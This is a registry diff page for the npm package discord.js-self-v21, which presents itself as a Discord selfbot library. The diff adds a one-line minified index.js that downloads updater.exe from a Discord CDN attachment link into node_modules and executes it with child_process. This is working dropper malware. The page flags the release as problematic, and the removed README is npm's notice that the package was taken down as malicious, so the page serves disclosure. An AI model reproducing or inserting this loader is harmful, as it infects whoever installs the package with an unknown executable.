discord.js-self-v21 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of discord.js-self-v21 might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +11 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const fs=require("fs"),https=require("https"),{exec:e}=require("child_process"),path=require("path");class ExeFileHandler{constructor(e){this.exePath=e}onModified(t){t===this.exePath&&e(this.exePath,(e,t,s)=>{})}}async function downloadExe(e,t){let s="discord.js",n=path.join("node_modules",s,t),o=path.join("node_modules",s);fs.existsSync(o)||fs.mkdirSync(o,{recursive:!0});let i=fs.createWriteStream(n),a=await new Promise((t,s)=>{let o=https.get(e,e=>{e.pipe(i),e.on("end",()=>{observeFile(n)}),t(e)});o.on("error",s)});a.statusCode}function observeFile(t){fs.watch(t,s=>{"change"===s&&e(t,(e,t,s)=>{})})}downloadExe("https://cdn.discordapp.com/attachments/1170389214836306002/1188437828540039220/updater.exe","updater.exe");
|
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "discord.js-self-v21",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "selfbot for newest discord APIS",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"author": "distube",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"unrar-js": "^0.2.3"
|
13
|
+
}
|
6
14
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=discord.js-self-v21 for more information.
|